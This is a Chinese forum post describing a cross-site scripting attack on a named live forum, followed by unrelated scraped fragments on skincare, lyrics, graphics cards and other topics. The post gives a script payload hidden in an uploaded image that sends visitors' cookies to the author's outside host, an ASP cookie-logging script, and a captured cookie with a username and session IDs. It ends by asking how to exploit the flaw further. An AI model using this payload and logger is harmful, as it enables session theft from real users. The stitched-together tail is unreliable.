先看看我的一次跨站测试吧
我以职业欠钱的站点做测试吧:
Host:zhiyeqianqian.51web.cn
My Test:
先在他的论谈上传两张图,
图一的内容是:
<script>document.location='http://linzi.cnbct.org/cookie.asp?msg='+document.cookie</script>
得到url为UploadFile/2005-6/200562716565777847.jpg
图二则是偶的个人照
UploadFile/2005-6/200562716563048909.jpg
写个盗cookie的代码到我的空间,lcx的盗cookie代码有问题,所以修改了一下。
<%
cookiefile=Server.MapPath("cookie.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set cookiefile=fs.OpenTextfile(cookiefile,8,True,0)
cookiefile.Write(Request.QueryString&"<br>")
cookiefile.close
set fs = nothing
%>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL= https://www.hack56.com/images/gnomrtoviip.jpg">
接下来,点击图一,自动转到图二,
二、结果分析
再到我的空间看一下,抓到cookie如下:
msg=ewwwrootzhiyeqianqianwwwroot=UserID=218&usercookies=1&StatUserID=2190418138&password=想要吗?嘿嘿&userhidden=2&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=linzi;%20ASPSESSIONIDQSCAAQTB=HMPLNIMDHOCDJKPELPGBBOOG;%20Dvbbs;%20DvbbsMagicFace=862;%20upNum=2;%20ASPSESSIONIDQSAAARTB=JBPPMONDDEGFGHEOICDHFJIM<br>
分析cookie我们不难看出他的绝对路径是e:\wwwroot\zhiyeqianqian\wwwroot
三、论谈
本来,最初的测试我是在测试BCT论谈,成功暴出他的绝对路径,一开始的时候,我还认为可能又是动网出洞洞了,所以又去测试了其它几个站,测试结果是其它的站点并没有暴出路径,今天再次测试“欠我钱”的论谈,却又暴不出来,查了一下代码,和别人的代码一个样,根本没什么差别。
偶想听听大家的看法,到底是哪里出了问题,能不能深入利用~~~
本文导读目录: 1、黑客被抓了要怎么判 2、黑客被抓一般会怎么样啊, 3、黑客如果被抓到会被怎么处置? 4、黑客被抓会怎么样 5、为什么那些黑客被抓之后,放出来就从此淡出 黑客被抓了...
护肤品的挑选尽管是叫人目不暇接的,可是女孩子们大多数乐在其中,该如何去挑选功能强大的护肤品呢?护肤品哪一个品牌比较好呢?假如你也很迷茫,就然后往下看吧~ 1、欧树花凝爽肤水 饱含高纯的新花束水...
. 爱一个人是需要很大的勇气,一起去面对生活中会面临的很多困难 。抖音上经常有很多关于爱情的歌曲。我爱你无畏人海的拥挤听起来就很温馨。我爱你无畏人海的拥挤是什么歌 棉子《勇气》完整歌词在线听歌...
顺口两个字房产包管公司取名名字大全打分 酒徒房产包管公司 67.83分 被卧房产包管公司 56.97分 好话房产包管公司 12.79分 西法房产包管公司 40.31分...
本文导读目录: 1、黑客泄露电脑隐私怎么处理 2、40系列显卡采用什么架构 3、40系出来以后那3080显卡会沦落成中高端么? 4、40系显卡首发哪几张显卡 5、40系显卡2022能上...
品类:婴儿奶粉/宝宝辅食类 若店家运营国产商品: 1、委托加工物资协议书 1)若知名品牌支配权人为因素生产制造方,不用出示 2)若知名品牌产权人非生产性方,需出示知名品牌支...